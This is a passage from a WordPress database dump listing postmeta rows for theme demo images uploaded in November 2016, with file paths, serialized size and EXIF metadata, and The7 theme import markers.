(2852,416,'_the7_imported_item','old-landing'),
(2853,428,'_wp_attached_file','2016/11/d-creative-agency.jpg'),
(2854,428,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:750;s:6:\"height\";i:500;s:4:\"file\";s:29:\"2016/11/d-creative-agency.jpg\";s:8:\"filesize\";i:80839;s:5:\"sizes\";a:2:{s:6:\"medium\";a:5:{s:4:\"file\";s:29:\"d-creative-agency-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:12335;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:29:\"d-creative-agency-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6145;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(2855,428,'_the7_imported_item','old-landing'),
(2856,448,'_wp_attached_file','2016/11/d-psy.jpg'),
(2857,448,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:750;s:6:\"height\";i:500;s:4:\"file\";s:17:\"2016/11/d-psy.jpg\";s:8:\"filesize\";i:78884;s:5:\"sizes\";a:2:{s:6:\"medium\";a:5:{s:4:\"file\";s:17:\"d-psy-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:13712;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:17:\"d-psy-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7009;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(2858,448,'_the7_imported_item','old-landing'),
(2859,451,'_wp_attached_file','2016/11/d-construction.jpg'),
(2860,451,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:750;s:6:\"height\";i:500;s:4:\"file\";s:26:\"2016/11/d-construction.jpg\";s:8:\"filesize\";i:74960;s:5:\"sizes\";a:2:{s:6:\"medium\";a:5:{s:4:\"file\";s:26:\"d-construction-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:11111;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:26:\"d-construction-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:5069;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(2861,451,'_the7_imported_item','old-landing'),
(2862,452,'_wp_attached_file','2016/11/d-resto.jpg'),
(2863,452,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:750;s:6:\"height\";i:500;s:4:\"file\";s:19:\"2016/11/d-resto.jpg\";s:8:\"filesize\";i:184148;s:5:\"sizes\";a:2:{s:6:\"medium\";a:5:{s:4:\"file\";s:19:\"d-resto-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:18073;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:19:\"d-resto-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7671;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(2864,452,'_the7_imported_item','old-landing'),
(2865,453,'_wp_attached_file','2016/11/d-artist.jpg'),
(2866,453,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:750;s:6:\"height\";i:500;s:4:\"file\";s:20:\"2016/11/d-artist.jpg\";s:8:\"filesize\";i:48104;s:5:\"sizes\";a:2:{s:6:\"medium\";a:5:{s:4:\"file\";s:20:\"d-artist-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:9306;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:20:\"d-artist-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:4865;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(2867,453,'_the7_imported_item','old-landing'),
(2868,507,'_wp_attached_file','2016/11/more.jpg'),
(2869,507,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:750;s:6:\"height\";i:500;s:4:\"file\";s:16:\"2016/11/more.jpg\";s:8:\"filesize\";i:10326;s:5:\"sizes\";a:2:{s:6:\"medium\";a:5:{s:4:\"file\";s:16:\"more-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:2481;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:16:\"more-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:1605;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(2870,507,'_the7_imported_item','old-landing'),
(2871,510,'_wp_attached_file','2016/11/d-product.jpg'),
(2872,510,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:750;s:6:\"height\";i:500;s:4:\"file\";s:21:\"2016/11/d-product.jpg\";s:8:\"filesize\";i:65660;s:5:\"sizes\";a:2:{s:6:\"medium\";a:5:{s:4:\"file\";s:21:\"d-product-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:11738;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:21:\"d-product-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6827;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(2873,510,'_the7_imported_item','old-landing'),
(2874,516,'_wp_attached_file','2016/11/d-cv.jpg'),
(2875,516,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:750;s:6:\"height\";i:500;s:4:\"file\";s:16:\"2016/11/d-cv.jpg\";s:8:\"filesize\";i:58757;s:5:\"sizes\";a:2:{s:6:\"medium\";a:5:{s:4:\"file\";s:16:\"d-cv-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:9059;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:16:\"d-cv-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:5054;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(2876,516,'_the7_imported_item','old-landing'),
(2877,520,'_wp_attached_file','2016/11/d-med.jpg'),
(2878,520,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:750;s:6:\"height\";i:500;s:4:\"file\";s:17:\"2016/11/d-med.jpg\";s:8:\"filesize\";i:95532;s:5:\"sizes\";a:2:{s:6:\"medium\";a:5:{s:4:\"file\";s:17:\"d-med-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:14022;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:17:\"d-med-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6892;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(2879,520,'_the7_imported_item','old-landing'),
(2880,526,'_wp_attached_file','2016/11/d-hosting.jpg'),
(2881,526,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:750;s:6:\"height\";i:500;s:4:\"file\";s:21:\"2016/11/d-hosting.jpg\";s:8:\"filesize\";i:78376;s:5:\"sizes\";a:2:{s:6:\"medium\";a:5:{s:4:\"file\";s:21:\"d-hosting-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:13262;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:21:\"d-hosting-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6327;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(2882,526,'_the7_imported_item','old-landing'),
(2883,535,'_wp_attached_file','2016/11/d-digital-agency.jpg'),
(2884,535,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:750;s:6:\"height\";i:500;s:4:\"file\";s:28:\"2016/11/d-digital-agency.jpg\";s:8:\"filesize\";i:79961;s:5:\"sizes\";a:2:{s:6:\"medium\";a:5:{s:4:\"file\";s:28:\"d-digital-agency-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:11777;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:28:\"d-digital-agency-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6378;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(2885,535,'_the7_imported_item','old-landing'),
(2886,545,'_wp_attached_file','2016/11/d-photography.jpg'),
(2887,545,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:750;s:6:\"height\";i:500;s:4:\"file\";s:25:\"2016/11/d-photography.jpg\";s:8:\"filesize\";i:129094;s:5:\"sizes\";a:2:{s:6:\"medium\";a:5:{s:4:\"file\";s:25:\"d-photography-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:17263;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:25:\"d-photography-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7652;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(2888,545,'_the7_imported_item','old-landing'),
(2889,560,'_wp_attached_file','2016/11/b-business-demo.jpg'),
(2890,560,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:750;s:6:\"height\";i:500;s:4:\"file\";s:27:\"2016/11/b-business-demo.jpg\";s:8:\"filesize\";i:84387;s:5:\"sizes\";a:2:{s:6:\"medium\";a:5:{s:4:\"file\";s:27:\"b-business-demo-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:12220;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:27:\"b-business-demo-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6543;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(2891,560,'_the7_imported_item','old-landing'),
(2892,562,'_wp_attached_file','2016/11/d-woo-shop.jpg'),
(2893,562,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:750;s:6:\"height\";i:500;s:4:\"file\";s:22:\"2016/11/d-woo-shop.jpg\";s:8:\"filesize\";i:66225;s:5:\"sizes\";a:2:{s:6:\"medium\";a:5:{s:4:\"file\";s:22:\"d-woo-shop-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:11456;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:22:\"d-woo-shop-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:5876;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(2894,562,'_the7_imported_item','old-landing'),
(2895,689,'_wp_attached_file','2016/11/ic-int.png'),
(2896,689,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:64;s:6:\"height\";i:64;s:4:\"file\";s:18:\"2016/11/ic-int.png\";s:8:\"filesize\";i:3323;s:5:\"sizes\";a:0:{}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(2897,689,'_the7_imported_item','old-landing'),
(2898,691,'_wp_attached_file','2016/11/ic-feat.png'),
(2899,691,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:75;s:6:\"height\";i:62;s:4:\"file\";s:19:\"2016/11/ic-feat.png\";s:8:\"filesize\";i:4469;s:5:\"sizes\";a:0:{}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(2900,691,'_the7_imported_item','old-landing'),
(2901,695,'_wp_attached_file','2016/11/ic-seven-demo.png'),
(2902,695,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:69;s:6:\"height\";i:62;s:4:\"file\";s:25:\"2016/11/ic-seven-demo.png\";s:8:\"filesize\";i:2958;s:5:\"sizes\";a:0:{}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(2903,695,'_the7_imported_item','old-landing'),
(2904,700,'_wp_attached_file','2016/11/i-op.png'),
(2905,700,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:74;s:6:\"height\";i:67;s:4:\"file\";s:16:\"2016/11/i-op.png\";s:8:\"filesize\";i:5493;s:5:\"sizes\";a:0:{}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(2906,700,'_the7_imported_item','old-landing'),
(2907,706,'_wp_attached_file','2016/11/i-testim.png'),
(2908,706,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:70;s:6:\"height\";i:64;s:4:\"file\";s:20:\"2016/11/i-testim.png\";s:8:\"filesize\";i:2737;s:5:\"sizes\";a:0:{}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(2909,706,'_the7_imported_item','old-landing'),
(2910,721,'_wp_attached_file','2016/11/stars-rating-landing-79x14-1.png'),
(2911,721,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:79;s:6:\"height\";i:14;s:4:\"file\";s:40:\"2016/11/stars-rating-landing-79x14-1.png\";s:8:\"filesize\";i:349;s:5:\"sizes\";a:0:{}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(2912,721,'_the7_imported_item','old-landing'),
(2913,730,'_wp_attached_file','2016/11/com-ic.png'),
(2914,730,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:39;s:6:\"height\";i:30;s:4:\"file\";s:18:\"2016/11/com-ic.png\";s:8:\"filesize\";i:1441;s:5:\"sizes\";a:0:{}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(2915,730,'_the7_imported_item','old-landing'),
(2916,835,'_wp_attached_file','2016/11/photo-showcase.jpg'),
(2917,835,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:750;s:6:\"height\";i:500;s:4:\"file\";s:26:\"2016/11/photo-showcase.jpg\";s:8:\"filesize\";i:89100;s:5:\"sizes\";a:2:{s:6:\"medium\";a:5:{s:4:\"file\";s:26:\"photo-showcase-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:15418;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:26:\"photo-showcase-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7245;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(2918,835,'_the7_imported_item','old-landing'),
(2919,1163,'_wp_attached_file','2016/11/d-news.jpg'),
(2920,1163,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:750;s:6:\"height\";i:500;s:4:\"file\";s:18:\"2016/11/d-news.jpg\";s:8:\"filesize\";i:111562;s:5:\"sizes\";a:2:{s:6:\"medium\";a:5:{s:4:\"file\";s:18:\"d-news-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:14299;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:18:\"d-news-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7185;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(2921,1163,'_the7_imported_item','old-landing'),
(2922,1164,'_wp_attached_file','2016/11/ic-demos.png'),
(2923,1164,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:90;s:6:\"height\";i:65;s:4:\"file\";s:20:\"2016/11/ic-demos.png\";s:8:\"filesize\";i:2808;s:5:\"sizes\";a:0:{}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(2924,1164,'_the7_imported_item','old-landing'),
(2925,1165,'_wp_attached_file','2016/11/i-w.png'),
(2926,1165,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:67;s:6:\"height\";i:70;s:4:\"file\";s:15:\"2016/11/i-w.png\";s:8:\"filesize\";i:4539;s:5:\"sizes\";a:0:{}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(2927,1165,'_the7_imported_item','old-landing'),
(2928,837,'_wp_attached_file','2016/11/design-showcase.jpg'),
(2929,837,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:750;s:6:\"height\";i:500;s:4:\"file\";s:27:\"2016/11/design-showcase.jpg\";s:8:\"filesize\";i:109427;s:5:\"sizes\";a:2:{s:6:\"medium\";a:5:{s:4:\"file\";s:27:\"design-showcase-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:14879;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:27:\"design-showcase-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6807;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(2930,837,'_the7_imported_item','old-landing'),
(2931,841,'_wp_attached_file','2016/11/window-showcase.jpg'),
